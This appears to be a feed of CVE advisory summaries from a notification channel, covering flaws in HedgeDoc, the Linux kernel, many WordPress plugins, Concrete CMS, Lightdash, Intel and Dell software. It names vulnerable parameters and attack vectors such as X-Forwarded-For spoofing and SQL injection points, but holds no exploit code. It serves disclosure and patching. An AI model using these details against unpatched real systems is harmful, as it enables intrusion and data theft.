🚨 CVE-2024-45308HedgeDoc is an open source, real-time, collaborative, markdown notes application. When using HedgeDoc 1 with MySQL or MariaDB, it is possible to create notes with an alias matching the ID of existing notes. The affected existing note can then not be accessed anymore and is effectively hidden by the new one. When the freeURL feature is enabled (by setting the `allowFreeURL` config option or the `CMD_ALLOW_FREEURL` environment variable to `true`), any user with the appropriate permissions can create a note with an arbitrary alias, e.g. by accessing it in the browser. When MySQL or MariaDB are used, it is possible to create a new note with an alias that matches the lower-cased ID of a different note. HedgeDoc then always presents the new note to users, as these databases perform case-insensitive matching and the lower-cased alias is found first. This issue only affects HedgeDoc instances that use MySQL or MariaDB. Depending on the permission settings of the HedgeDoc instance, the issue can be exploited only by logged-in users or by all (including non-logged-in) users. The exploit requires knowledge of the ID of the target note. Attackers could use this issue to present a manipulated copy of the original note to the user, e.g. by replacing the links with malicious ones. Attackers can also use this issue to prevent access to the original note, causing a denial of service. No data is lost, as the original content of the affected notes is still present in the database. Users are advised to upgrade to version 1.10.0 which addresses this issue. Users unable to upgrade may disable freeURL mode which prevents the exploitation of this issue. The impact can also be limited by restricting freeURL note creation to trusted, logged-in users by enabling `requireFreeURLAuthentication`/`CMD_REQUIRE_FREEURL_AUTHENTICATION`.🎖@cveNotify |
|
| 2024-09-02 18:37:31 |
🚨 CVE-2024-44947In the Linux kernel, the following vulnerability has been resolved:fuse: Initialize beyond-EOF page contents before setting uptodatefuse_notify_store(), unlike fuse_do_readpage(), does not enable pagezeroing (because it can be used to change partial page contents).So fuse_notify_store() must be more careful to fully initialize pagecontents (including parts of the page that are beyond end-of-file)before marking the page uptodate.The current code can leave beyond-EOF page contents uninitialized, whichmakes these uninitialized page contents visible to userspace via mmap().This is an information leak, but only affects systems which do notenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or thecorresponding kernel command line parameter).🎖@cveNotify |
|
| 2024-09-02 18:37:30 |
🚨 CVE-2024-43797audiobookshelf is a self-hosted audiobook and podcast server. A non-admin user is not allowed to create libraries (or access only the ones they have permission to). However, the `LibraryController` is missing the check for admin user and thus allows a path traversal issue. Allowing non-admin users to write to any directory in the system can be seen as a form of path traversal. However, since it can be restricted to only admin permissions, fixing this is relatively simple and falls more into the realm of Role-Based Access Control (RBAC). This issue has been addressed in release version 2.13.0. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-09-02 18:37:26 |
🚨 CVE-2024-43792Halo is an open source website building tool. A security vulnerability has been identified in versions prior to 2.17.0 of the Halo project. This vulnerability allows an attacker to execute malicious scripts in the user's browser through specific HTML and JavaScript code, potentially leading to a Cross-Site Scripting (XSS) attack. Users are advised to upgrade to version 2.17.0+. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-09-02 18:37:25 |
🚨 CVE-2023-7279A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-09-02 18:37:24 |
🚨 CVE-2020-36830A vulnerability was found in nescalante urlregex up to 0.5.0 and classified as problematic. This issue affects some unknown processing of the file index.js of the component Backtracking. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.5.1 is able to address this issue. The identifier of the patch is e5a085afe6abfaea1d1a78f54c45af9ef43ca1f9. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-09-02 12:37:32 |
🚨 CVE-2024-33016memory corruption when an invalid firehose patch command is invoked.🎖@cveNotify |
|
| 2024-09-02 12:37:25 |
🚨 CVE-2024-23359Information disclosure while decoding Tracking Area Update Accept or Attach Accept message received from network.🎖@cveNotify |
|
| 2024-09-02 12:37:24 |
🚨 CVE-2024-23358Transient DOS when registration accept OTA is received with incorrect ciphering key data IE in Modem.🎖@cveNotify |
|
| 2024-09-02 09:37:27 |
🚨 CVE-2024-1847Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, IPT, JT, SAT, STL, STP, X_B or X_T file. NOTE: CVE-2024-3298 and CVE-2024-3299 were SPLIT from this ID.🎖@cveNotify |
|
| 2024-09-02 09:37:26 |
🚨 CVE-2023-2763Use-After-Free, Out-of-bounds Write and Heap-based Buffer Overflow vulnerabilities exist in the DWG and DXF file reading procedure in SOLIDWORKS Desktop from Release SOLIDWORKS 2021 through Release SOLIDWORKS 2023. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted DWG or DXF file.🎖@cveNotify |
|
| 2024-09-02 08:37:25 |
🚨 CVE-2024-7690The DN Popup WordPress plugin through 1.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-09-02 08:37:24 |
🚨 CVE-2024-7354The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-09-02 05:37:38 |
🚨 CVE-2024-39775in OpenHarmony v4.1.0 and prior versions allow a remote attacker cause information leak through out-of-bounds Read.🎖@cveNotify |
|
| 2024-09-02 05:37:31 |
🚨 CVE-2024-38386in OpenHarmony v4.1.0 and prior versions allow a local attacker arbitrary code execution in pre-installed apps through out-of-bounds write.🎖@cveNotify |
|
| 2024-09-02 05:37:30 |
🚨 CVE-2024-20089In wlan, there is a possible denial of service due to incorrect error handling. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08861558; Issue ID: MSV-1526.🎖@cveNotify |
|
| 2024-09-02 05:37:26 |
🚨 CVE-2024-20088In keyinstall, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08932099; Issue ID: MSV-1543.🎖@cveNotify |
|
| 2024-09-02 05:37:25 |
🚨 CVE-2024-20085In power, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08944204; Issue ID: MSV-1560.🎖@cveNotify |
|
| 2024-09-02 05:37:24 |
🚨 CVE-2024-20084In power, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08944210; Issue ID: MSV-1561.🎖@cveNotify |
|
| 2024-09-02 00:37:51 |
🚨 CVE-2024-45270WordPress plugin "Carousel Slider" provided by Sayful Islam contains a cross-site request forgery vulnerability on Hero image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.🎖@cveNotify |
|
| 2024-09-02 00:37:50 |
🚨 CVE-2024-45269WordPress plugin "Carousel Slider" provided by Sayful Islam contains a cross-site request forgery vulnerability on Carousel image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.🎖@cveNotify |
|
| 2024-09-01 22:37:25 |
🚨 CVE-2024-45192An issue was discovered in Matrix libolm through 3.2.16. Cache-timing attacks can occur due to use of base64 when decoding group session keys. This refers to the libolm implementation of Olm. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-09-01 22:37:24 |
🚨 CVE-2024-45191An issue was discovered in Matrix libolm through 3.2.16. The AES implementation is vulnerable to cache-timing attacks due to use of S-boxes. This is related to software that uses a lookup table for the SubWord step. This refers to the libolm implementation of Olm. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-09-01 11:37:24 |
🚨 CVE-2024-5053The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server.🎖@cveNotify |
|
| 2024-09-01 05:37:24 |
🚨 CVE-2024-8368A vulnerability was found in code-projects Hospital Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-01 04:37:24 |
🚨 CVE-2024-8367A vulnerability was found in HM Courts & Tribunals Service Probate Back Office up to c1afe0cdb2b2766d9e24872c4e827f8b82a6cd31. It has been classified as problematic. Affected is an unknown function of the file src/main/java/uk/gov/hmcts/probate/service/NotificationService.java of the component Markdown Handler. The manipulation leads to injection. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as d90230d7cf575e5b0852d56660104c8bd2503c34. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-08-31 14:37:24 |
🚨 CVE-2024-44946In the Linux kernel, the following vulnerability has been resolved:kcm: Serialise kcm_sendmsg() for the same socket.syzkaller reported UAF in kcm_release(). [0]The scenario is 1. Thread A builds a skb with MSG_MORE and sets kcm->seq_skb. 2. Thread A resumes building skb from kcm->seq_skb but is blocked by sk_stream_wait_memory() 3. Thread B calls sendmsg() concurrently, finishes building kcm->seq_skb and puts the skb to the write queue 4. Thread A faces an error and finally frees skb that is already in the write queue 5. kcm_release() does double-free the skb in the write queueWhen a thread is building a MSG_MORE skb, another thread must not touch it.Let's add a per-sk mutex and serialise kcm_sendmsg().[0]:BUG: KASAN: slab-use-after-free in __skb_unlink include/linux/skbuff.h:2366 [inline]BUG: KASAN: slab-use-after-free in __skb_dequeue include/linux/skbuff.h:2385 [inline]BUG: KASAN: slab-use-after-free in __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]BUG: KASAN: slab-use-after-free in __skb_queue_purge include/linux/skbuff.h:3181 [inline]BUG: KASAN: slab-use-after-free in kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691Read of size 8 at addr ffff0000ced0fc80 by task syz-executor329/6167CPU: 1 PID: 6167 Comm: syz-executor329 Tainted: G B 6.8.0-rc5-syzkaller-g9abbc24128bc #0Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024Call trace: dump_backtrace+0x1b8/0x1e4 arch/arm64/kernel/stacktrace.c:291 show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:298 __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd0/0x124 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:377 [inline] print_report+0x178/0x518 mm/kasan/report.c:488 kasan_report+0xd8/0x138 mm/kasan/report.c:601 __asan_report_load8_noabort+0x20/0x2c mm/kasan/report_generic.c:381 __skb_unlink include/linux/skbuff.h:2366 [inline] __skb_dequeue include/linux/skbuff.h:2385 [inline] __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline] __skb_queue_purge include/linux/skbuff.h:3181 [inline] kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691 __sock_release net/socket.c:659 [inline] sock_close+0xa4/0x1e8 net/socket.c:1421 __fput+0x30c/0x738 fs/file_table.c:376 ____fput+0x20/0x30 fs/file_table.c:404 task_work_run+0x230/0x2e0 kernel/task_work.c:180 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0x618/0x1f64 kernel/exit.c:871 do_group_exit+0x194/0x22c kernel/exit.c:1020 get_signal+0x1500/0x15ec kernel/signal.c:2893 do_signal+0x23c/0x3b44 arch/arm64/kernel/signal.c:1249 do_notify_resume+0x74/0x1f4 arch/arm64/kernel/entry-common.c:148 exit_to_user_mode_prepare arch/arm64/kernel/entry-common.c:169 [inline] exit_to_user_mode arch/arm64/kernel/entry-common.c:178 [inline] el0_svc+0xac/0x168 arch/arm64/kernel/entry-common.c:713 el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:730 el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598Allocated by task 6166: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x40/0x78 mm/kasan/common.c:68 kasan_save_alloc_info+0x70/0x84 mm/kasan/generic.c:626 unpoison_slab_object mm/kasan/common.c:314 [inline] __kasan_slab_alloc+0x74/0x8c mm/kasan/common.c:340 kasan_slab_alloc include/linux/kasan.h:201 [inline] slab_post_alloc_hook mm/slub.c:3813 [inline] slab_alloc_node mm/slub.c:3860 [inline] kmem_cache_alloc_node+0x204/0x4c0 mm/slub.c:3903 __alloc_skb+0x19c/0x3d8 net/core/skbuff.c:641 alloc_skb include/linux/skbuff.h:1296 [inline] kcm_sendmsg+0x1d3c/0x2124 net/kcm/kcmsock.c:783 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] sock_sendmsg+0x220/0x2c0 net/socket.c:768 splice_to_socket+0x7cc/0xd58 fs/splice.c:889 do_splice_from fs/splice.c:941 [inline] direct_splice_actor+0xec/0x1d8 fs/splice.c:1164 splice_direct_to_actor+0x438/0xa0c fs/splice.c:1108 do_splice_direct_actor ---truncated---🎖@cveNotify |
|
| 2024-08-31 10:37:24 |
🚨 CVE-2022-4539The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.🎖@cveNotify |
|
| 2024-08-31 09:37:30 |
🚨 CVE-2024-7717The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-31 09:37:26 |
🚨 CVE-2024-0110NVIDIA CUDA Toolkit contains a vulnerability in command `cuobjdump` where a user may cause an out-of-bound write by passing in a malformed ELF file. A successful exploit of this vulnerability may lead to code execution or denial of service.🎖@cveNotify |
|
| 2024-08-31 09:37:25 |
🚨 CVE-2022-4536The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.🎖@cveNotify |
|
| 2024-08-31 09:37:24 |
🚨 CVE-2022-4100The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked.🎖@cveNotify |
|
| 2024-08-31 08:37:25 |
🚨 CVE-2024-39579Dell PowerScale OneFS versions 8.2.2.x through 9.8.0.0 contains an incorrect privilege assignment vulnerability. A local high privileged attacker could potentially exploit this vulnerability to gain root-level access.🎖@cveNotify |
|
| 2024-08-31 08:37:24 |
🚨 CVE-2024-39578Dell PowerScale OneFS versions 8.2.2.x through 9.8.0.1 contains a UNIX symbolic link (symlink) following vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to denial of service, information tampering.🎖@cveNotify |
|
| 2024-08-31 07:37:24 |
🚨 CVE-2024-44945In the Linux kernel, the following vulnerability has been resolved:netfilter: nfnetlink: Initialise extack before use in ACKsAdd missing extack initialisation when ACKing BATCH_BEGIN and BATCH_END.🎖@cveNotify |
|
| 2024-08-31 05:37:25 |
🚨 CVE-2024-5212The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-31 05:37:24 |
🚨 CVE-2024-3886The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-31 04:07:25 |
🚨 CVE-2024-24973Improper input validation for some Intel(R) Distribution for GDB software before version 2024.0.1 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-08-31 04:07:24 |
🚨 CVE-2024-23495Incorrect default permissions in some Intel(R) Distribution for GDB software before version 2024.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-08-31 03:37:25 |
🚨 CVE-2024-7435The Attire theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.6 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-08-31 03:37:24 |
🚨 CVE-2024-23491Uncontrolled search path in some Intel(R) Distribution for GDB software before version 2024.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-08-31 03:07:25 |
🚨 CVE-2024-7030The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update product and category descriptions, category titles and images, and sort order.🎖@cveNotify |
|
| 2024-08-31 03:07:24 |
🚨 CVE-2024-42939A cross-site scripting (XSS) vulnerability in the component /index/index.html of YZNCMS v1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the configured remarks text field.🎖@cveNotify |
|
| 2024-08-31 02:37:24 |
🚨 CVE-2024-39747IBM Sterling Connect:Direct Web Services 6.0, 6.1, 6.2, and 6.3 uses default credentials for potentially critical functionality.🎖@cveNotify |
|
| 2024-08-31 00:37:45 |
🚨 CVE-2023-7256In affected libpcap versions during the setup of a remote packet capture the internal function sock_initaddress() calls getaddrinfo() and possibly freeaddrinfo(), but does not clearly indicate to the caller function whether freeaddrinfo() still remains to be called after the function returns. This makes it possible in some scenarios that both the function and its caller call freeaddrinfo() for the same allocated memory block. A similar problem was reported in Apple libpcap, to which Apple assigned CVE-2023-40400.🎖@cveNotify |
|
| 2024-08-30 23:37:25 |
🚨 CVE-2024-6586Lightdash version 0.1024.6 allows users with the necessary permissions, such as Administrator or Editor, to create and share dashboards. A dashboard that contains HTML elements which point to a threat actor controlled source can trigger an SSRF request when exported, via a POST request to /api/v1/dashboards//export. The forged request contains the value of the exporting user’s session token. A threat actor could obtain the session token of any user who exports the dashboard. The obtained session token can be used to perform actions as the victim on the application, resulting in session takeover.🎖@cveNotify |
|
| 2024-08-30 23:37:24 |
🚨 CVE-2024-6585Multiple stored cross-site scripting (“XSS”) vulnerabilities in the markdown dashboard and dashboard comment functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to inject malicious scripts into vulnerable web pages. A threat actor could potentially exploit this vulnerability to store malicious JavaScript which executes in the context of a user’s session with the application.🎖@cveNotify |
|
| 2024-08-30 22:37:36 |
🚨 CVE-2024-8348A vulnerability, which was classified as critical, has been found in SourceCodester Computer Laboratory Management System 1.0. Affected by this issue is the function delete_category of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-30 22:37:35 |
🚨 CVE-2024-8347A vulnerability classified as critical was found in SourceCodester Computer Laboratory Management System 1.0. Affected by this vulnerability is the function delete_record of the file /classes/Master.php?f=delete_record. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-30 22:37:31 |
🚨 CVE-2024-44684TpMeCMS 1.3.3.2 is vulnerable to Cross Site Scripting (XSS) in /h.php/page?ref=addtabs via the "Title," "Images," and "Content" fields.🎖@cveNotify |
|
| 2024-08-30 22:37:30 |
🚨 CVE-2024-3181Concrete CMS version 9 prior to 9.2.8 and previous versions prior to 8.5.16 are vulnerable to Stored XSS in the Search Field. Prior to the fix, stored XSS could be executed by an administrator changing a filter to which a rogue administrator had previously added malicious code. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting🎖@cveNotify |
|
| 2024-08-30 22:37:26 |
🚨 CVE-2024-3179Concrete CMS version 9 before 9.2.8 and previous versions before 8.5.16 are vulnerable to Stored XSS in the Custom Class page editing. Prior to the fix, a rogue administrator could insert malicious code in the custom class field due to insufficient validation of administrator provided data. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting.🎖@cveNotify |
|
| 2024-08-30 22:37:25 |
🚨 CVE-2024-2753Concrete CMS version 9 before 9.2.8 and previous versions prior to 8.5.16 is vulnerable to Stored XSS on the calendar color settings screen since Information input by the user is output without escaping. A rogue administrator could inject malicious javascript into the Calendar Color Settings screen which might be executed when users visit the affected page. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 2.0 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N&version=3.1 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator Thank you Rikuto Tauchi for reporting🎖@cveNotify |
|
| 2024-08-30 22:37:24 |
🚨 CVE-2024-2179Concrete CMS version 9 before 9.2.7 is vulnerable to Stored XSS via the Name field of a Group type since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Name field which might be executed when users visit the affected page. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 2.2 with a vector of AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N Concrete versions below 9 do not include group types so they are not affected by this vulnerability. Thanks Luca Fuda for reporting.🎖@cveNotify |
|
| 2024-08-30 21:07:26 |
🚨 CVE-2024-38436Commugen SOX 365 – CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-08-30 21:07:25 |
🚨 CVE-2024-37545Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Nick Halsey Floating Social Media Links allows Stored XSS.This issue affects Floating Social Media Links: from n/a through 1.5.2.🎖@cveNotify |
|
| 2024-08-30 21:07:24 |
🚨 CVE-2024-37538Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Thomas Kuhlmann Link To Bible allows Stored XSS.This issue affects Link To Bible: from n/a through 2.5.9.🎖@cveNotify |
|
| 2024-08-30 20:07:26 |
🚨 CVE-2024-42339CyberArk - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-08-30 20:07:25 |
🚨 CVE-2024-42337CyberArk - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-08-30 20:07:24 |
🚨 CVE-2024-37958Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Meks Meks Smart Author Widget allows Stored XSS.This issue affects Meks Smart Author Widget: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-08-30 19:37:32 |
🚨 CVE-2024-3673The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.🎖@cveNotify |
|
| 2024-08-30 19:37:31 |
🚨 CVE-2024-45488One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.🎖@cveNotify |
|
| 2024-08-30 19:37:30 |
🚨 CVE-2023-52042An issue discovered in sub_4117F8 function in TOTOLINK X6000R V9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the 'lang' parameter.🎖@cveNotify |
|
| 2024-08-30 19:37:26 |
🚨 CVE-2023-5558The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2024-08-30 19:37:25 |
🚨 CVE-2023-46943An issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.8. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.🎖@cveNotify |
|
| 2024-08-30 19:37:24 |
🚨 CVE-2024-0226Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload.🎖@cveNotify |
|
| 2024-08-30 18:37:25 |
🚨 CVE-2023-22285Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2024-08-30 18:37:24 |
🚨 CVE-2022-36374Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmi Windows 5.27.03.0003 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-08-30 18:07:31 |
🚨 CVE-2024-6118A Plaintext Storage of a Password vulnerability in ebooknote function in Hamastar MeetingHub Paperless Meetings 2021 allows remote attackers to obtain the other users’ credentials and gain access to the product via an XML file.🎖@cveNotify |
|
| 2024-08-30 18:07:30 |
🚨 CVE-2024-41889Multiple Pimax products accept WebSocket connections from unintended endpoints. If this vulnerability is exploited, arbitrary code may be executed by a remote unauthenticated attacker.🎖@cveNotify |
|
| 2024-08-30 18:07:26 |
🚨 CVE-2024-39838ZWX-2000CSW2-HN firmware versions prior to Ver.0.3.15 uses hard-coded credentials, which may allow a network-adjacent attacker with an administrative privilege to alter the configuration of the device.🎖@cveNotify |
|
| 2024-08-30 18:07:25 |
🚨 CVE-2024-37956Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Vektor,Inc. VK All in One Expansion Unit allows Stored XSS.This issue affects VK All in One Expansion Unit: from n/a through 9.99.1.0.🎖@cveNotify |
|
| 2024-08-30 18:07:24 |
🚨 CVE-2024-37955Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Zakaria Binsaifullah GutSlider – All in One Block Slider allows Stored XSS.This issue affects GutSlider – All in One Block Slider: from n/a through 2.7.3.🎖@cveNotify |
|
| 2024-08-30 17:37:31 |
🚨 CVE-2024-8345A vulnerability was found in SourceCodester Music Gallery Site 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=delete. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-30 17:37:30 |
🚨 CVE-2024-6204Zohocorp ManageEngine Exchange Reporter Plus versions before 5715 are vulnerable to SQL Injection in the reports module.🎖@cveNotify |
|
| 2024-08-30 17:37:26 |
🚨 CVE-2024-44918A cross-site scripting (XSS) vulnerability in the component admin_datarelate.php of SeaCMS v12.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2024-08-30 17:37:25 |
🚨 CVE-2024-42447Insufficient Session Expiration vulnerability in Apache Airflow Providers FAB.This issue affects Apache Airflow Providers FAB: 1.2.1 (when used with Apache Airflow 2.9.3) and FAB 1.2.0 for all Airflow versions. The FAB provider prevented the user from logging out. * FAB provider 1.2.1 only affected Airflow 2.9.3 (earlier and later versions of Airflow are not affected)* FAB provider 1.2.0 affected all versions of Airflow.Users who run Apache Airflow 2.9.3 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2 which fixes the issue.Users who run Any Apache Airflow version and have FAB provider 1.2.0 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2 which fixes the issue.Also upgrading Apache Airflow to latest version available is recommended.Note: Early version of Airflow reference container images of Airflow 2.9.3 and constraint files contained FAB provider 1.2.1 version, but this is fixed in updated versions of the images. Users are advised to pull the latest Airflow images or reinstall FAB provider according to the current constraints.🎖@cveNotify |
|
| 2024-08-30 17:37:24 |
🚨 CVE-2023-34431Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access🎖@cveNotify |
|
| 2024-08-30 17:07:25 |
🚨 CVE-2024-36448** UNSUPPORTED WHEN ASSIGNED ** Server-Side Request Forgery (SSRF) vulnerability in Apache IoTDB Workbench.This issue affects Apache IoTDB Workbench: from 0.13.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-30 17:07:24 |
